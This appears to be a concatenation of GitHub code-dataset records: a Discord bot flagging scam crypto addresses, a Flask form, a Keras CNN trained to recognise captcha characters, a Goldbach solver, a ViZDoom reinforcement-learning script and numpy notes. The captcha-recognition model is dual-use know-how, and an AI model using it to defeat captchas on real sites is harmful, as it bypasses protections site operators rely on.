or in your group's \"group-#\" channel. \r\n '''\r\n # Ignore messages from us \r\n if message.author.id == self.user.id:\r\n return\r\n \r\n # Check if this message was sent in a server (\"guild\") or if it's a DM\r\n if message.guild:\r\n await self.handle_channel_message(message)\r\n else:\r\n await self.handle_dm(message)\r\n \r\n async def on_message_edit(self, before, after):\r\n \"\"\"\r\n This function is called whenever a message is edited.\r\n The bot is configured to check if a cryptoaddress has been edited, and whether or not the new message contains a\r\n blacklisted crypto address.\r\n \"\"\"\r\n with open(\"blacklist.txt\", \"r\") as file:\r\n addresses = file.readlines()\r\n for add in addresses:\r\n add = add.strip()\r\n if add in after.content:\r\n r = \"Message has been edited to contain fraudulent or suspicious crypto addresses. \"\r\n await after.reply(r)\r\n break\r\n elif add in before.content:\r\n r = \"Message previously containing fraudulent/suspicious crypto addresses have been edited to contain a new crypto address.\"\r\n await after.reply(r)\r\n break\r\n file.close()\r\n \r\n async def fwd_reported(self, message_id):\r\n message = await self.group_channel.fetch_message(message_id)\r\n # Forward the message to the mod channel\r\n mod_channel = self.mod_channels[message.guild.id]\r\n\r\n fwd = f'Forwarded message with ID {message.id} \\n{message.author.name}: \"{message.content}\"'\r\n\r\n fwd += '\\n\\nPrevious content reviewer reports include the following: '\r\n message_info = self.db.get_cr_reports(message.id)\r\n if message_info == None:\r\n fwd += '\\nNo reports found.'\r\n else:\r\n for i in range(1, message_info['cr_report_count'] + 1):\r\n report = message_info['cr_reports'][i]\r\n author = report['author']\r\n desc = report['description']\r\n time = report['time']\r\n fwd += f'\\nBy {author} at {time}: \"{desc}\"'\r\n fwd += '\\n\\nPlease review public engagement with Tweet and react to this message with 👍 if it suggests the Tweet is a scam.'\r\n fwd += ' In this case, you will be asked to submit a content reviewer report.'\r\n fwd += ' Otherwise, react with 👎.'\r\n fwd += ' If prior reviews indicate the original message should be deleted, react with ❌.'\r\n await mod_channel.send(fwd)\r\n\r\n async def handle_dm(self, message):\r\n # Handle a help message\r\n if message.content == Report.HELP_KEYWORD:\r\n reply = \"Use the `report` command to begin the reporting process.\\n\"\r\n reply += \"Use the `cancel` command to cancel the report process.\\n\"\r\n print(\"Send reply to help\")\r\n await message.channel.send(reply)\r\n return\r\n\r\n author_id = message.author.id\r\n responses = []\r\n\r\n # Only respond to messages if they're part of a reporting flow\r\n if author_id not in self.reports and not message.content.startswith(Report.START_KEYWORD):\r\n return\r\n\r\n # If we don't currently have an active report for this user, add one\r\n if author_id not in self.reports:\r\n self.reports[author_id] = Report(self)\r\n \r\n # Let the report class handle this message; forward all the messages it returns to us\r\n responses = await self.reports[author_id].handle_message(message)\r\n for r in responses:\r\n await message.channel.send(r)\r\n\r\n # If the report is complete or cancelled, remove it from our map\r\n if self.reports[author_id].report_complete():\r\n # Get message ID corresponding to report\r\n mid = self.reports[author_id].message_id\r\n # Message ID identified (report completed)\r\n if mid > 0:\r\n # Check if message should be forwarded\r\n if self.reports[author_id].should_fwd or self.db.get_not_severe(mid) > 2:\r\n await self.fwd_reported(mid)\r\n else:\r\n self.db.add_not_severe(mid)\r\n # Remove complete/conacelled report from our map\r\n self.reports.pop(author_id)\r\n\r\n async def handle_mod_message(self, message):\r\n # Handle replies to reports in \"group-#-mod\" channel\r\n if message.channel.name == f'group-{self.group_num}-mod':\r\n # Message is a reply and message is not from bot\r\n if message.reference is not None and message.author.id != self.user.id:\r\n # Get prompt message\r\n ref_id = message.reference.message_id\r\n original_id = self.db.get_message_from_prompt(ref_id)\r\n # Message requires content reviewer report\r\n if original_id != None:\r\n # Add report to database\r\n time = message.created_at.strftime(\"%m/%d/%Y, %H:%M:%S\")\r\n report = self.create_report(message.author.name, time, message.content)\r\n self.db.add_report(original_id, report)\r\n self.db.remove_prompt(ref_id)\r\n await message.reply(f'Successfully added content reviewer report for report message with ID {original_id}.')\r\n\r\n async def handle_channel_message(self, message):\r\n\r\n if message.channel.name == f'group-{self.group_num}-mod':\r\n await self.handle_mod_message(message)\r\n return\r\n\r\n # Only handle messages sent in the \"group-#\" channel\r\n if not message.channel.name == f'group-{self.group_num}':\r\n return \r\n\r\n # Automated flagging using blacklist\r\n if (self.check_blacklist(message)):\r\n await message.reply(\"Message contains fraudulent or suspicious crypto address.\")\r\n return\r\n \r\n # Automated flagging using classifier\r\n if (self.check_classifier(message)):\r\n self.db.add_not_severe(message.id)\r\n return\r\n\r\n def create_report(self, author, time, description):\r\n '''\r\n Given information about a report, create a dictionary representation of the report.\r\n '''\r\n report_dict = {\r\n 'author': author,\r\n 'time': time,\r\n 'description': description\r\n }\r\n return report_dict\r\n\r\n def check_blacklist(self, message):\r\n with open(\"blacklist.txt\", \"r\") as file:\r\n addresses = file.readlines()\r\n for add in addresses:\r\n add = add.strip()\r\n if add in message.content:\r\n return True\r\n return False\r\n \r\n def check_classifier(self, message):\r\n\r\n # Check if messages are disguised in unicode\r\n content_decoded = unidecode(message.content, errors='preserve')\r\n if content_decoded != message.content:\r\n message.content = content_decoded\r\n\r\n string = message.content\r\n contains_btc_add = bool(re.search(\"[13][a-km-zA-HJ-NP-Z1-9]{25,34}\", string))\r\n contains_eth_add = bool(re.search(\"0x[a-fA-F0-9]{40}$\", string))\r\n phrases = ['legit', 'legitimate', 'send me', 'double', 'whatsapp']\r\n legit_bot_phrases = ['transferred from', 'move from']\r\n contains_scam_phrase = False\r\n for phrase in phrases:\r\n if phrase in string.lower():\r\n contains_scam_phrase = True\r\n contains_legit_phrase = False\r\n for phrase in legit_bot_phrases:\r\n if phrase in string.lower():\r\n contains_legit_phrase = True\r\n return ((not contains_legit_phrase) and (contains_btc_add or contains_eth_add or contains_scam_phrase))\r\n \r\n \r\nclient = ModBot(perspective_key)\r\nclient.run(discord_token)","repo_name":"alexjwang/cs152-group23","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":13053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"15126077008","text":"from flask_wtf import FlaskForm\nfrom wtforms import (DateField, RadioField, SelectField, SubmitField,\n SelectMultipleField, StringField, widgets)\nfrom wtforms.validators import DataRequired\nfrom recipe_scheduler.events.widgets import MySelect\n\n\nclass EventForm(FlaskForm):\n \"\"\"\n Form for recipe site\n \"\"\"\n event_date = DateField(\n 'Date',\n validators=[DataRequired()]\n )\n event_type = RadioField(\n 'Type',\n choices=[(\"0\", \"Breakfast\"), (\"1\", \"Lunch\"), (\"2\", \"Dinner\")],\n default=\"0\"\n )\n category_id = SelectField(\n 'Category',\n coerce=int\n )\n recipe_id = SelectField(\n 'Recipe',\n coerce=int,\n widget=MySelect()\n )\n submit = SubmitField('Post')\n\n\nclass MultiCheckboxField(SelectMultipleField):\n widget = widgets.ListWidget(prefix_label=False)\n option_widget = widgets.CheckboxInput()\n\n\nclass RandomEventForm(FlaskForm):\n event_date = StringField(\n 'Date',\n validators=[DataRequired()]\n )\n event_type = MultiCheckboxField(\n 'Types',\n choices=[('0', 'breakfast'), ('1', 'lunch'), ('2', 'dinner')]\n )\n categories = MultiCheckboxField(\n 'Categories',\n coerce=int\n )\n submit = SubmitField('Random')\n","repo_name":"gadenahi/recipe-scheduler","sub_path":"recipe_scheduler/events/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"34559048503","text":"import os\r\nimport tensorflow as tf\r\nfrom tensorflow.python.keras import *\r\nfrom tensorflow.python.keras.layers import *\r\nfrom tensorflow.python.keras.optimizers import RMSprop,Adam\r\nfrom tensorflow.python.keras.models import load_model\r\nfrom tensorflow.python.keras.callbacks import EarlyStopping\r\nfrom tensorflow.python.keras.preprocessing.image import ImageDataGenerator,load_img,img_to_array\r\n\r\n\r\n# define some Environmental variable\r\nNOW_PATH = str(os.getcwd()).replace('\\\\', '/') + \"/\"\r\nTRAIN_PATH = os.path.join(NOW_PATH ,'WEBLMT_train_divide/')\r\nVALID_PATH = os.path.join(NOW_PATH,'WEBLMT_test_divide/')\r\nMODEL_PATH = os.path.join(NOW_PATH ,'./model/capcha_model.h5')\r\n\r\nDIVIDE_IMAGE_HEIGHT = 16\r\nDIVIDE_IMAGE_WEIGHT = 16\r\n\r\nDIVIDE_LABEL_SIZE = 36\r\n\r\nBATCH_SIZE = 300\r\nLEARN_RATE = 0.00025\r\n\r\nclass CaptchaTensorFlow(object):\r\n def __init__(self, learn_rate=LEARN_RATE, train_path=TRAIN_PATH, valid_path=VALID_PATH, model_path = MODEL_PATH):\r\n self.learn_rate = learn_rate\r\n self.train_path = train_path\r\n self.valid_path = valid_path\r\n self.model_path = MODEL_PATH\r\n self.model = self.build_model()\r\n self.captcha_class = []\r\n for i in range(36):\r\n if i < 10:\r\n self.captcha_class.append(str(i))\r\n else:\r\n self.captcha_class.append(chr(i + 87))\r\n\r\n def build_model(self):\r\n img_input = layers.Input(shape=(DIVIDE_IMAGE_HEIGHT,DIVIDE_IMAGE_WEIGHT,1))\r\n x = layers.Conv2D(64,3,strides=(1, 1),padding='same',activation='relu')(img_input)\r\n x = layers.MaxPool2D(pool_size=(2, 2),strides=(2, 2),padding='SAME')(x)\r\n\r\n x = layers.Conv2D(128,3,strides=(1, 1),padding='same',activation='relu')(x)\r\n x = layers.MaxPool2D(pool_size=(2, 2),strides=(2, 2),padding='SAME')(x)\r\n\r\n x = layers.Conv2D(256,3,strides=(1, 1),padding='same',activation='relu')(x)\r\n x = layers.MaxPool2D(pool_size=(2, 2),strides=(2, 2),padding='SAME')(x)\r\n\r\n x = layers.Flatten()(x)\r\n\r\n x = layers.Dense(1080,activation='relu')(x)\r\n x = layers.Dropout(rate = 0.9)(x)\r\n\r\n output = layers.Dense(DIVIDE_LABEL_SIZE,activation='softmax')(x)\r\n model = Model(img_input,output)\r\n return model\r\n\r\n\r\n def train(self):\r\n #下面使用高阶语句构建模型\r\n model = self.build_model()\r\n model.compile(loss='categorical_crossentropy',\r\n # optimizer=RMSprop(lr=0.001),\r\n optimizer = Adam(lr=self.learn_rate),\r\n # optimizer=tf.train.AdamOptimizer(learning_rate=self.learn_rate),\r\n metrics=['accuracy'])\r\n\r\n callbacks = [EarlyStopping(\r\n monitor='val_loss', patience=2)]\r\n\r\n # All images will be rescaled by 1./255\r\n train_datagen = ImageDataGenerator(rescale=1./255)\r\n test_datagen = ImageDataGenerator(rescale=1./255)\r\n\r\n # Flow training images in batches of 20 using train_datagen generator\r\n train_generator = train_datagen.flow_from_directory(\r\n self.train_path, # This is the source directory for training images\r\n target_size=(DIVIDE_IMAGE_HEIGHT,DIVIDE_IMAGE_WEIGHT), \r\n color_mode='grayscale',\r\n batch_size=BATCH_SIZE,\r\n # Since we use binary_crossentropy loss, we need binary labels\r\n class_mode='categorical')\r\n\r\n # Flow validation images in batches of 20 using test_datagen generator\r\n validation_generator = test_datagen.flow_from_directory(\r\n self.valid_path,\r\n target_size=(DIVIDE_IMAGE_HEIGHT,DIVIDE_IMAGE_WEIGHT),\r\n color_mode='grayscale',\r\n batch_size=BATCH_SIZE,\r\n class_mode='categorical')\r\n\r\n history = model.fit_generator(\r\n train_generator,\r\n epochs=1000,\r\n callbacks=callbacks,\r\n validation_data=validation_generator,\r\n verbose=2)\r\n self.model = model\r\n model.save(self.model_path)\r\n #########################这是分界线#################\r\n\r\n def loadModel(self,model_path=None):\r\n if model_path is not None:\r\n self.model_path = model_path\r\n self.model = load_model(self.model_path)\r\n \r\n def predict(self,pic_array):\r\n pred = self.model.predict(pic_array)\r\n return pred\r\n\r\n def bitsToResult(self,pred):\r\n pred_list = list(pred.reshape(DIVIDE_LABEL_SIZE))\r\n return self.captcha_class[pred_list.index(1)]\r\n\r\n# test_img = 'WEBLMT_test_divide/2/0010-2.png'\r\ntest_img = 'WEBLMT_test_divide/f/0002-0.png'\r\nlabels = []\r\nif __name__ == '__main__':\r\n train_nn = CaptchaTensorFlow()\r\n choice = input(\"1、Train\\n2、Test\\n\")\r\n if choice == '1':\r\n train_nn.train()\r\n else:\r\n train_nn.loadModel()\r\n pic = load_img(test_img,grayscale=True)\r\n pic_array = img_to_array(pic).reshape(1,DIVIDE_IMAGE_HEIGHT,DIVIDE_IMAGE_HEIGHT,1)\r\n pred = train_nn.predict(pic_array)\r\n\r\n result = train_nn.bitsToResult(pred)\r\n print(result)\r\n\r\n\r\n\r\n","repo_name":"YangXi2016/captcha","sub_path":"Captcha_tensorflow_keras.py","file_name":"Captcha_tensorflow_keras.py","file_ext":"py","file_size_in_byte":5115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"44615199376","text":"# 17103 골드바흐 파티션\nimport sys\n\ndef eratos(n): # 에라토스테네스의 체\n sieve = [True] * (n+1) # 체\n sieve[0], sieve[1] = [False] * 2\n\n # n의 최대 약수가 sqrt(n) 이하이므로 i=sqrt(n)까지 검사\n sqrtN = int((n+1) ** 0.5)\n for i in range(2, sqrtN + 1):\n if sieve[i]: # i가 소수인 경우\n for j in range((i+i), (n+1), i): # i이후 i의 배수들을 False 판정\n sieve[j] = False\n\n # primeArr 생성\n # primeArr = list()\n # for i in range(2, (n+1)):\n # if sieve[i]:\n # primeArr.append(i)\n\n return sieve\n\ndef main():\n t = int(sys.stdin.readline())\n inputN = list()\n for _ in range(t):\n inputN.append(int(sys.stdin.readline()))\n\n sieve = eratos(max(inputN))\n for n in inputN:\n cnt = 0\n for i in range(n // 2 + 1):\n if sieve[i] and sieve[n-i]:\n cnt += 1\n print(cnt)\n\n return\n\nmain()\n","repo_name":"coding-study-19/datastructure-and-algorithm","sub_path":"datastructure/수학/에라토스테네스의 체/17103_es.py","file_name":"17103_es.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"1071919154","text":"import itertools as it\nfrom random import sample, randint, random, choice, shuffle\nfrom time import time, sleep\nimport numpy as np\nimport skimage.color, skimage.transform\nimport tensorflow as tf\nfrom tqdm import trange\nimport vizdoom as vzd\nimport glob\nfrom vizdoom import *\nimport pickle\nimport matplotlib.pyplot as plt\n#from doom_utils import *\nfrom collections import deque\n\n\nactions = [\n\n[0,0,0,0,0,0,0,0],\n\n[1,0,0,0,0,0,0,0],\n[0,1,0,0,0,0,0,0],\n#[0,0,1,0,0,0,0,0],\n#[0,0,0,1,0,0,0,0],\n[0,0,0,0,1,0,0,0],\n[0,0,0,0,0,1,0,0],\n[0,0,0,0,0,0,1,0],\n[0,0,0,0,0,0,0,1],\n\n#[0,0,1,0,0,1,0,0],\n#[0,0,1,0,1,0,0,0],\n#[0,0,0,1,0,1,0,0],\n#[0,0,0,1,1,0,0,0],\n\n[0,0,0,0,0,1,1,0],\n[0,0,0,0,0,1,0,1],\n[0,0,0,0,1,0,1,0],\n[0,0,0,0,1,0,0,1],\n\n\n[1,0,0,0,0,1,0,0],\n[1,0,0,0,1,0,0,0],\n#[1,0,0,1,0,0,0,0],\n#[1,0,1,0,0,0,0,0],\n\n#[1,0,1,0,0,1,0,0],\n#[1,0,1,0,1,0,0,0],\n[1,0,0,1,0,1,0,0],\n[1,0,0,1,1,0,0,0],\n\n[1,0,0,0,0,1,1,0],\n[1,0,0,0,0,1,0,1],\n[1,0,0,0,1,0,1,0],\n[1,0,0,0,1,0,0,1],\n\n\n[0,1,0,0,0,1,0,0],\n[0,1,0,0,1,0,0,0],\n#[0,1,0,1,0,0,0,0],\n#[0,1,1,0,0,0,0,0],\n\n#[0,1,1,0,0,1,0,0],\n#[0,1,1,0,1,0,0,0],\n#[0,1,0,1,0,1,0,0],\n#[0,1,0,1,1,0,0,0],\n\n[0,1,0,0,0,1,1,0],\n[0,1,0,0,0,1,0,1],\n[0,1,0,0,1,0,1,0],\n[0,1,0,0,1,0,0,1],\n\n[1,0,0,0,0,0,0,1],\n[1,0,0,0,0,0,1,0],\n[0,1,0,0,0,0,0,1],\n[0,1,0,0,0,0,1,0]\n]\n\n\ndef dist_from_goal(current_pos, starting_pos, goal_pos):\n\n x_disp = starting_pos[0] - current_pos[0]\n y_disp = starting_pos[1] - current_pos[1]\n\n x_dist_from_goal = x_disp - goal_pos[0]\n y_dist_from_goal = y_disp - goal_pos[1]\n\n return np.sqrt((x_dist_from_goal ** 2) + (y_dist_from_goal ** 2)), x_disp, y_disp\n\ndef preprocess(img):\n\n img = np.rollaxis(img, 0, 3)\n img = img[:,:,0] #should be red channel\n img = img[80:380, 40:600]\n img = skimage.transform.resize(img, (60,108))\n img = img.astype(np.float32)\n\n img = 2.0 * img - 1.0\n\n return img\n\ndef create_coord_channels(img):\n # run this just once at beginning, then stack each training step\n\n rows, cols = img.shape\n\n row_coords = np.arange(cols)\n row_coords = 2*row_coords/cols\n row_coords = row_coords - 1.0\n row_coords = np.tile(row_coords, [rows,1])\n\n col_coords = np.arange(rows)\n col_coords = 2*col_coords/rows\n col_coords = col_coords - 1.0\n col_coords = np.tile(col_coords, [cols,1])\n col_coords = np.transpose(col_coords)\n\n return row_coords, col_coords\n\nclass ReplayMemory:\n def __init__(self, capacity, channels, resolution):\n #channels =\n state1_shape = (capacity, resolution[0], resolution[1], channels)\n #print(state1_shape)\n #state2_shape = (capacity, resolution[0], resolution[1], 1)\n self.s1 = np.zeros(state1_shape, dtype=np.float32)\n self.s2 = np.zeros(state1_shape, dtype=np.float32)\n self.a = np.zeros(capacity, dtype=np.int32)\n self.r = np.zeros(capacity, dtype=np.float32)\n self.isterminal = np.zeros(capacity, dtype=np.float32)\n\n self.capacity = capacity\n self.size = 0\n self.pos = 0\n\n def add_transition(self, s1, action, s2, isterminal, reward):\n self.s1[self.pos, :, :, :] = s1\n self.a[self.pos] = action\n if not isterminal:\n self.s2[self.pos, :, :, :] = s2\n self.isterminal[self.pos] = isterminal\n self.r[self.pos] = reward\n\n self.pos = (self.pos + 1) % self.capacity\n self.size = min(self.size + 1, self.capacity)\n\n def get_sample(self, sample_size):\n i = sample(range(0, self.size), sample_size)\n return self.s1[i], self.a[i], self.s2[i], self.isterminal[i], self.r[i]\n\ndef create_network(session, available_actions_count, resolution, channels, learning_rate):\n # Create the input variables\n s1_ = tf.placeholder(tf.float32, [None] + list(resolution) + [channels], name=\"State\")\n a_ = tf.placeholder(tf.int32, [None], name=\"Action\")\n target_q_ = tf.placeholder(tf.float32, [None, available_actions_count], name=\"TargetQ\")\n\n # Add 2 convolutional layers with ReLu activation\n conv1 = tf.contrib.layers.convolution2d(s1_, num_outputs=128, kernel_size=[8, 8], stride=[3, 3],\n activation_fn=tf.nn.relu,\n weights_initializer=tf.contrib.layers.xavier_initializer_conv2d(),\n biases_initializer=tf.constant_initializer(0.1))\n\n conv2 = tf.contrib.layers.convolution2d(conv1, num_outputs=128, kernel_size=[3, 3], stride=[2, 2],\n activation_fn=tf.nn.relu,\n weights_initializer=tf.contrib.layers.xavier_initializer_conv2d(),\n biases_initializer=tf.constant_initializer(0.1))\n\n conv2_flat = tf.contrib.layers.flatten(conv2)\n\n\n fc1 = tf.contrib.layers.fully_connected(conv2_flat, num_outputs=128, activation_fn=tf.nn.relu,\n weights_initializer=tf.contrib.layers.xavier_initializer(),\n biases_initializer=tf.constant_initializer(0.1))\n\n fc2 = tf.contrib.layers.fully_connected(fc1, num_outputs=32, activation_fn=tf.nn.relu,\n weights_initializer=tf.contrib.layers.xavier_initializer(),\n biases_initializer=tf.constant_initializer(0.1))\n\n\n q = tf.contrib.layers.fully_connected(fc2, num_outputs=available_actions_count, activation_fn=None,\n weights_initializer=tf.contrib.layers.xavier_initializer(),\n biases_initializer=tf.constant_initializer(0.1))\n best_a = tf.argmax(q, 1)\n\n loss = tf.losses.mean_squared_error(q, target_q_)\n\n optimizer = tf.train.RMSPropOptimizer(learning_rate)\n # Update the parameters according to the computed gradient using RMSProp.\n train_step = optimizer.minimize(loss)\n\n def function_learn(s1, target_q):\n feed_dict = {s1_: s1, target_q_: target_q}\n l, _ = session.run([loss, train_step], feed_dict=feed_dict)\n return l\n\n def get_loss(s1, target_q):\n feed_dict = {s1_: s1, target_q_: target_q}\n l = session.run([loss], feed_dict=feed_dict)\n return l\n\n def function_get_q_values(state):\n return session.run(q, feed_dict={s1_: state})\n\n def function_get_best_action(state):\n return session.run(best_a, feed_dict={s1_: state})\n\n def function_simple_get_best_action(state,channels):\n return function_get_best_action(state.reshape([1, resolution[0], resolution[1], channels]))[0]\n\n return function_learn, function_get_q_values, function_simple_get_best_action\n\ndef learn_from_memory(memory):\n \"\"\" Learns from a single transition (making use of replay memory).\n s2 is ignored if s2_isterminal \"\"\"\n\n # Get a random minibatch from the replay memory and learns from it.\n if memory.size > batch_size:\n s1, a, s2, isterminal, r = memory.get_sample(batch_size)\n\n q2 = np.max(get_q_values(s2), axis=1)\n target_q = get_q_values(s1)\n # target differs from q only for the selected action. The following means:\n # target_Q(s,a) = r + gamma * max Q(s2,_) if not isterminal else r\n target_q[np.arange(target_q.shape[0]), a] = r + discount_factor * (1 - isterminal) * q2\n learn(s1, target_q)\n\ndef perform_learning_step_stack(memory, epoch, initial_position, frame_queue, r, c, frame_grabs):\n \"\"\" Makes an action according to eps-greedy policy, observes the result\n (next state, reward) and learns from the transition\"\"\"\n\n channels = 5\n\n def exploration_rate(epoch):\n \"\"\"# Define exploration rate change over time\"\"\"\n start_eps = 0.4\n end_eps = 0.05\n const_eps_epochs = 0.05 * epochs # 10% of learning time\n eps_decay_epochs = 0.5 * epochs # 80% of learning time\n\n if epoch < const_eps_epochs:\n return start_eps\n elif epoch < eps_decay_epochs:\n # Linear decay\n return start_eps - (epoch - const_eps_epochs) / \\\n (eps_decay_epochs - const_eps_epochs) * (start_eps - end_eps)\n else:\n return end_eps\n\n s1 = preprocess(game.get_state().screen_buffer)\n\n #if epoch % 3 == 0:\n\n # print(s1.shape)\n\n frame_queue.append(s1)\n frame_queue.popleft()\n\n frames = [frame_queue[x] for x in frame_grabs]\n frames.append(r)\n frames.append(c)\n\n state_1 = np.dstack(frames)\n\n # With probability eps make a random action.\n eps = exploration_rate(epoch)\n\n if random() <= eps:\n a = randint(0, len(actions) - 1)\n else:\n # Choose the best action according to the network.\n a = get_best_action(state_1, channels)\n\n # Extrinsic reward\n extrinsic_reward = game.make_action(actions[a], frame_repeat)\n\n # insert if statement if its close enough turn off coords\n # if\n # intrinsic position reward\n current_pos = [game.get_game_variable(GameVariable.POSITION_X),\n game.get_game_variable(GameVariable.POSITION_Y)]\n\n\n\n dist, x, y = dist_from_goal(current_pos, initial_pos, goal_position)\n\n dist_reward = -1 * dist\n\n if dist < 200:\n\n reward = extrinsic_reward\n\n elif extrinsic_reward < -50000:\n\n #print('Death!')\n\n reward = dist_reward + extrinsic_reward\n\n else:\n\n reward = dist_reward\n\n isterminal = game.is_episode_finished()\n\n fin = 0\n\n if isterminal:\n\n #print('total reward:', game.get_total_reward())\n\n #if extrinsic_reward < -40000:\n\n #print('DEAD!')\n\n if game.get_total_reward() > -1 * episode_timeout:\n\n fin = 1\n\n reward = 10000\n\n print('found the exit!!')\n\n if not isterminal:\n\n s2 = preprocess(game.get_state().screen_buffer)\n\n else:\n\n s2 = np.zeros((60,108))\n\n frame_queue.append(s2)\n frame_queue.popleft()\n\n frames = [frame_queue[x] for x in frame_grabs]\n frames.append(r)\n frames.append(c)\n\n state_2 = np.dstack(frames)\n\n #print(state_1.shape)\n #print(s2.shape)\n\n # Remember the transition that was just experienced.\n memory.add_transition(state_1, a, state_2, isterminal, reward)\n\n print(reward)\n\n plt.figure()\n\n plt.subplot(141)\n plt.imshow(state_1[:,:,-1])\n\n plt.subplot(142)\n plt.imshow(state_1[:,:,-2])\n\n plt.subplot(143)\n plt.imshow(state_1[:,:,-3])\n\n plt.subplot(144)\n plt.imshow(state_1[:,:,0])\n\n plt.show()\n\n\n learn_from_memory(memory)\n return reward, x, y, fin, frame_queue\n\n# Creates and initializes ViZDoom environment.\ndef initialize_vizdoom(config_file_path, wad_file_path, difficulty):\n\n print(\"Initializing doom...\")\n game = vzd.DoomGame()\n\n game.load_config(config_file_path)\n game.set_doom_scenario_path(wad_file_path)\n\n game.set_window_visible(True)\n game.set_mode(vzd.Mode.PLAYER)\n #game.set_screen_format(vzd.ScreenFormat.GRAY8)\n game.set_screen_resolution(vzd.ScreenResolution.RES_640X480)\n\n game.set_doom_skill(difficulty)\n\n\n game.init()\n print(\"Doom initialized.\")\n\n return game\n\n\nlearning_rate = 0.001\ndiscount_factor = 0.99\n\nepochs = 50\nepisodes_per_epoch = 50\n\nepisode_timeout = 4000\n\nreplay_memory_size = 25000\n\nbatch_size = 64\n\nframe_repeat = 12\n\nresolution = (60,108)\n\nframe_q_length = 10\nframe_grabs = [-1,-3,-8]\n\nchannels = len(frame_grabs) + 2\n# +2 for r and c!\n\n\ngoal_dictionary = {\n'oblige_29_no_mon': (1040,1220)\n}\n\ntraining_wads = ['oblige_29_no_mon.wad']\n\nwad_prefix = 'wad_files/'\n\nsave_model = True\nload_model = True\n\nDEFAULT_MODEL_SAVEFILE = \"saved_models/model_1/model_1\"\nDEFAULT_MODEL_LOADFILE = \"saved_models/model_1/model_1\"\n\nconfig = 'configs/standard_config.cfg'\n\ninit_wad = wad_prefix + training_wads[0]\n\ngame = initialize_vizdoom(config, init_wad, 1)\n\n\nmemory = ReplayMemory(replay_memory_size, channels, resolution)\n\nsession = tf.Session()\nlearn, get_q_values, get_best_action = create_network(session, len(actions), resolution, channels, learning_rate)\nsaver = tf.train.Saver()\n\nif load_model:\n\n print(\"Loading model from: \", DEFAULT_MODEL_LOADFILE)\n saver.restore(session, DEFAULT_MODEL_LOADFILE)\n\nelse:\n\n init = tf.global_variables_initializer()\n session.run(init)\n\n\ngame.add_game_args(\"+freelook 1\")\ngame.set_screen_resolution(vzd.ScreenResolution.RES_640X480)\ngame.set_window_visible(True)\ngame.set_mode(vzd.Mode.SPECTATOR)\n\ngame.init()\n\ngame.new_episode()\n\ninit_state = game.get_state()\ninit_screen = init_state.screen_buffer\ninit_screen = preprocess(init_screen)\n\n# Need to initialize queue every episode!\n# To prevent the exit frames from going into the beginning of the next one\n\n\n\nrow_coords, col_coords = create_coord_channels(init_screen)\n\n#frame_queue = deque([np.zeros(init_screen.shape)] * frame_q_length)\n\n\nexit_percent_collector = []\n\nplt.figure()\n\nfor epoch in range(epochs):\n\n print('Epoch:', str(epoch + 1), 'out of', epochs)\n\n\n train_episodes_finished = 0\n exit_counter = 0\n\n shuffle(training_wads)\n\n for current_wad in training_wads:\n\n wad_file = current_wad\n\n m_wad = wad_prefix + wad_file\n\n goal_position = goal_dictionary[wad_file[:-4]]\n\n print(m_wad, goal_position)\n\n game = initialize_vizdoom(config, m_wad, 1)\n\n initial_pos = [game.get_game_variable(GameVariable.POSITION_X),\n game.get_game_variable(GameVariable.POSITION_Y)]\n\n\n game.new_episode()\n frame_queue = deque([np.zeros(init_screen.shape)] * frame_q_length)\n\n current_ep = 0\n\n while current_ep < episodes_per_epoch:\n\n while not game.is_episode_finished():\n\n r,x,y,fin,frame_queue = perform_learning_step_stack(memory, epoch, initial_pos, frame_queue, row_coords, col_coords, frame_grabs)\n\n if game.is_episode_finished():\n\n #print('episode complete!')\n\n game.new_episode()\n frame_queue = deque([np.zeros(init_screen.shape)] * frame_q_length)\n\n current_ep += 1\n\n exit_counter += fin\n\n train_episodes_finished += 1\n\n\n\n\n game.close()\n\n print('')\n exit_percent_collector.append(float(exit_counter) /train_episodes_finished)\n\n plt.clf()\n plt.plot(exit_percent_collector)\n plt.pause(0.1)\n\n\n print(\"Saving the network weigths to:\", DEFAULT_MODEL_SAVEFILE)\n saver.save(session, DEFAULT_MODEL_SAVEFILE)\n\nplt.show()\n\n\n\n\n\n'''\n\n#plt.figure()\n\nwhile not game.is_episode_finished():\n\n state = game.get_state()\n time = game.get_episode_time()\n\n game.advance_action()\n last_action = game.get_last_action()\n reward = game.get_last_reward()\n\n screen = state.screen_buffer\n screen = preprocess(screen)\n\n z = np.dstack((screen, r, c))\n\n frame_queue.append(screen)\n frame_queue.popleft()\n\n frames = [frame_queue[x] for x in frame_grabs]\n frames.append(r)\n frames.append(c)\n print(len(frames))\n\n frames = np.dstack(frames)\n\n print(frames.shape)\n\n #plt.imshow(frames[:,:,-1] - frames[:,:,-2])\n #plt.pause(0.01)\n'''\n","repo_name":"paulgowdy/crowdAI_doom","sub_path":"full_model_1.py","file_name":"full_model_1.py","file_ext":"py","file_size_in_byte":15111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"7345709238","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- \n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# tableau une dimension\na = np.array([1,2,3])\n# print(\"a :\", a)\n\n# tableau 2 dimensions, type float\nb = np.array([(1.4,2.4,5.5,6.6), (3.5,6.2,7.4,8.8)], dtype = float)\nprint(\"b :\", b)\n\nb = b.reshape(8 ,)\nprint(\"b :\", b)\n\n\nbb = np.array([(1.4,2.4), (3.5,6.2),(4.4,5.6)], dtype = float)\n# print(\"bb :\", bb)\n\n# placeholder = espace reserve\n\n\n# genere les lignes (rows) avec un \n# numpy.random.randn(10, 10) : array 2d de 10 x 10 nombres dune distribution gaussienne standard(moyenne 0, ecart-type 1).\n\n# Pour les nombres [1,2,3], la moyenne est de 2, la variance est 0,667\n# [(1 - 2)2 + (2 - 2)2 + (3 - 2)2] ÷ 3 = 0,667\n# [somme de l'écart au carré] ÷ nombre d'observations = variance\n\n# Variance, S2 = moyenne de l ecart au carre de valeurs par rapport a la moyenne\n# Comme le calcul de la variance se fait a partir des carres des ecarts, les unites de mesure ne sont pas les memes que celles des observations 